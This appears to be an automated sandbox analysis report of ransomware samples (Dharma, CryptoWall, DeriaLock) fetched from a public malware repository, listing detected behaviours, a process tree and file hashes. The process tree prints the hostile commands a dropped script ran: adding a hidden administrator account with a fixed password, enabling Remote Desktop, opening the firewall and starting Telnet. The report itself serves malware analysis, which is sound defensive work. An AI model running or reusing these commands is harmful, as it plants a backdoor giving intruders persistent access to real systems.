Resubmissions

12/05/2024, 23:12

240512-268aqsge5x 8

12/05/2024, 23:08

240512-24jjlage4x 10

12/05/2024, 23:00

240512-2y6f6sbe99 1

12/05/2024, 22:56

240512-2w4jssbe92 10

12/05/2024, 22:52

240512-2tg8sagd8v 10

12/05/2024, 22:47

240512-2qptfsbe63 10

12/05/2024, 22:41

240512-2mlydsbe49 9

12/05/2024, 22:39

240512-2kxxwagd41 10

12/05/2024, 22:35

240512-2h1kzsgd4s 10

Analysis

  • max time kernel
    247s
  • max time network
    247s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/05/2024, 22:41

General

  • Target

    https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 12 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 31 IoCs
  • NTFS ADS 5 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 32 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Ransomware
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1076
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe403346f8,0x7ffe40334708,0x7ffe40334718
      2⤵
        PID:4660
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
        2⤵
          PID:3944
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1548
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
          2⤵
            PID:4724
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
            2⤵
              PID:400
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
              2⤵
                PID:4180
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
                2⤵
                  PID:3776
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4416
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5376 /prefetch:8
                  2⤵
                    PID:1852
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                    2⤵
                      PID:3068
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6076 /prefetch:8
                      2⤵
                        PID:4968
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3960
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1
                        2⤵
                          PID:4596
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1420
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
                          2⤵
                            PID:2976
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
                            2⤵
                              PID:3484
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
                              2⤵
                                PID:4460
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
                                2⤵
                                  PID:4344
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
                                  2⤵
                                    PID:4224
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 /prefetch:8
                                    2⤵
                                      PID:1204
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4596
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6224 /prefetch:2
                                      2⤵
                                        PID:4872
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                        2⤵
                                          PID:3176
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5636 /prefetch:8
                                          2⤵
                                            PID:3616
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                            2⤵
                                              PID:4068
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4780 /prefetch:8
                                              2⤵
                                                PID:832
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
                                                2⤵
                                                  PID:4892
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:8
                                                  2⤵
                                                    PID:2948
                                                  • C:\Users\Admin\Downloads\Dharma.exe
                                                    "C:\Users\Admin\Downloads\Dharma.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4260
                                                  • C:\Users\Admin\Downloads\Dharma.exe
                                                    "C:\Users\Admin\Downloads\Dharma.exe"
                                                    2⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    PID:5032
                                                    • C:\Users\Admin\Downloads\ac\nc123.exe
                                                      "C:\Users\Admin\Downloads\ac\nc123.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:2268
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c cls
                                                        4⤵
                                                          PID:1476
                                                      • C:\Users\Admin\Downloads\ac\mssql.exe
                                                        "C:\Users\Admin\Downloads\ac\mssql.exe"
                                                        3⤵
                                                        • Sets service image path in registry
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: LoadsDriver
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2252
                                                      • C:\Users\Admin\Downloads\ac\mssql2.exe
                                                        "C:\Users\Admin\Downloads\ac\mssql2.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5080
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
                                                        3⤵
                                                          PID:2704
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
                                                          3⤵
                                                            PID:3744
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
                                                              4⤵
                                                                PID:3856
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                                                                  5⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2496
                                                                • C:\Windows\SysWOW64\find.exe
                                                                  Find "="
                                                                  5⤵
                                                                    PID:3256
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                  4⤵
                                                                    PID:4568
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                      5⤵
                                                                        PID:4572
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net localgroup Administrators systembackup /add
                                                                      4⤵
                                                                        PID:412
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 localgroup Administrators systembackup /add
                                                                          5⤵
                                                                            PID:2144
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                                                                          4⤵
                                                                            PID:216
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                                                                              5⤵
                                                                                PID:1220
                                                                              • C:\Windows\SysWOW64\find.exe
                                                                                Find "="
                                                                                5⤵
                                                                                  PID:5016
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net localgroup "Remote Desktop Users" systembackup /add
                                                                                4⤵
                                                                                  PID:3024
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
                                                                                    5⤵
                                                                                      PID:1676
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net accounts /forcelogoff:no /maxpwage:unlimited
                                                                                    4⤵
                                                                                      PID:3972
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                                                                                        5⤵
                                                                                          PID:992
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                                                                                        4⤵
                                                                                          PID:1116
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                                                                          4⤵
                                                                                            PID:3736
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
                                                                                            4⤵
                                                                                              PID:672
                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                              attrib C:\users\systembackup +r +a +s +h
                                                                                              4⤵
                                                                                              • Sets file to hidden
                                                                                              • Views/modifies file attributes
                                                                                              PID:1040
                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                              netsh firewall add portopening TCP 3389 "Remote Desktop"
                                                                                              4⤵
                                                                                              • Modifies Windows Firewall
                                                                                              PID:4864
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc config tlntsvr start=auto
                                                                                              4⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2256
                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                              net start Telnet
                                                                                              4⤵
                                                                                                PID:2484
                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                  C:\Windows\system32\net1 start Telnet
                                                                                                  5⤵
                                                                                                    PID:3952
                                                                                              • C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
                                                                                                "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Enumerates connected drives
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4452
                                                                                            • C:\Users\Admin\Downloads\Dharma.exe
                                                                                              "C:\Users\Admin\Downloads\Dharma.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4824
                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4880
                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3340
                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                1⤵
                                                                                                  PID:4340
                                                                                                • C:\Users\Admin\Downloads\CryptoWall.exe
                                                                                                  "C:\Users\Admin\Downloads\CryptoWall.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:2820
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                    2⤵
                                                                                                    • Drops startup file
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5052
                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                      -k netsvcs
                                                                                                      3⤵
                                                                                                        PID:2488
                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                    1⤵
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4892
                                                                                                  • C:\Users\Admin\Downloads\CryptoWall.exe
                                                                                                    "C:\Users\Admin\Downloads\CryptoWall.exe"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:400
                                                                                                  • C:\Users\Admin\Downloads\CryptoWall.exe
                                                                                                    "C:\Users\Admin\Downloads\CryptoWall.exe"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4492
                                                                                                  • C:\Users\Admin\Downloads\CryptoWall.exe
                                                                                                    "C:\Users\Admin\Downloads\CryptoWall.exe"
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1752
                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                    1⤵
                                                                                                    • Drops startup file
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:2780
                                                                                                  • C:\Users\Admin\Downloads\DeriaLock.exe
                                                                                                    "C:\Users\Admin\Downloads\DeriaLock.exe"
                                                                                                    1⤵
                                                                                                    • Drops startup file
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3192
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    explorer.exe
                                                                                                    1⤵
                                                                                                      PID:900
                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                      1⤵
                                                                                                        PID:2944
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:3644
                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                                                                        1⤵
                                                                                                          PID:4324
                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:5052

                                                                                                        Network

                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          a8e767fd33edd97d306efb6905f93252

                                                                                                          SHA1

                                                                                                          a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

                                                                                                          SHA256

                                                                                                          c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

                                                                                                          SHA512

                                                                                                          07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          439b5e04ca18c7fb02cf406e6eb24167

                                                                                                          SHA1

                                                                                                          e0c5bb6216903934726e3570b7d63295b9d28987

                                                                                                          SHA256

                                                                                                          247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

                                                                                                          SHA512

                                                                                                          d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          0182dd995e358765a03dff9922861cfc

                                                                                                          SHA1

                                                                                                          acc21e02895e35533528e29ee7fd76f55361608c

                                                                                                          SHA256

                                                                                                          a0343b741f6adb374f78282ad9861c53c32eaf206d70baf6057b1d1a196d170b

                                                                                                          SHA512

                                                                                                          2f2d57197f0f697d01f0e44c84627c727f307af9c96bba4a1b3577b3e5b55a32fe31c598829c13135fbd8afc1b2c5a0b7988f26681b5ffa25de7ba725602876d

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                          Filesize

                                                                                                          579B

                                                                                                          MD5

                                                                                                          c6dba56b9c097935596daed379ede4ae

                                                                                                          SHA1

                                                                                                          f8603b0cfcabf7ac5e9de6497d38e5ea417d3a4f

                                                                                                          SHA256

